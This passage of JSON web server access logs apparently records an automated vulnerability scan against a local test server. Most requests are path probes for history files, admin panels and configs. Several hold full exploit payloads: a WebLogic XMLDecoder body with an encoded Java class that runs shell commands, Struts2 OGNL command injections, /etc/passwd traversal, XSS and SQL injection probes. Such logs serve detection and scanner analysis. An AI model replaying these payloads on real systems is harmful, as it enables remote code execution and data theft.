+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pentaho/api/userrolelist/systemRoles?require-cfg.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=snippets&tag= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ksh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openapi.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"xxxxorg.slf4j.ext.EventData<java><void class=\x22sun.misc.BASE64Decoder\x22><void method=\x22decodeBuffer\x22 id=\x22byte_arr\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\x22org.mozilla.classfile.DefiningClassLoader\x22><void method=\x22defineClass\x22><string>ResultBaseExec</string><object idref=\x22byte_arr\x22></object><void method=\x22newInstance\x22><void method=\x22do_exec\x22 id=\x22result\x22><string>echo${IFS}COP-9272-9102-EVC|rev</string></void></void></void></void><void class=\x22java.lang.Thread\x22 method=\x22currentThread\x22><void method=\x22getCurrentWork\x22 id=\x22current_work\x22><void method=\x22getClass\x22><void method=\x22getDeclaredField\x22><string>connectionHandler</string><void method=\x22setAccessible\x22><boolean>true</boolean></void><void method=\x22get\x22><object idref=\x22current_work\x22></object><void method=\x22getServletRequest\x22><void method=\x22getResponse\x22><void method=\x22getServletOutputStream\x22><void method=\x22writeStream\x22><object class=\x22weblogic.xml.util.StringInputStream\x22><object idref=\x22result\x22></object></object></void><void method=\x22flush\x22/></void><void method=\x22getWriter\x22><void method=\x22write\x22><string></string></void></void></void></void></void></void></void></void></void></java>","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wls-wsat/CoordinatorPortType HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RDWeb/Pages/en-US/login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"requester=login&request=login¶ms=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%2C%7B%22name%22%3A%22device_key%22%2C%22value%22%3A%22a2fe6b53-e09d-46df-8c9a-e666430e163e%22%7D%2C%7B%22name%22%3A%22auto_login%22%2C%22value%22%3Afalse%7D%2C%7B%22name%22%3A%22login_key%22%2C%22value%22%3A%22%22%7D%5D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /http/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/main.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/componentutils/login.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"proId=1'&addToCart=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /action.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mt/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/userrolelist/systemRoles?require-cfg.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.sh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /core/config/databases.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"{\x22id\x22: 1, \x22method\x22: \x22global.login\x22, \x22params\x22: {\x22authorityType\x22: \x22Default\x22, \x22clientType\x22: \x22NetKeyboard\x22, \x22loginType\x22: \x22Direct\x22, \x22password\x22: \x22Not Used\x22, \x22passwordType\x22: \x22Default\x22, \x22userName\x22: \x22admin\x22}, \x22session\x22: 0}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /RPC2_Login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.tugboat HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xampp/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/build.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/componentutils/login.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sql.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mt.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../conf/config.properties HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"{\x22sheet\x22:[\x22.es(*)\x22],\x22time\x22:{\x22from\x22:\x22now-1m\x22,\x22to\x22:\x22now\x22,\x22mode\x22:\x22quick\x22,\x22interval\x22:\x22auto\x22,\x22timezone\x22:\x22Asia/Shanghai\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/timelion/run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hp/device/DeviceInformation/View HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.zsh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 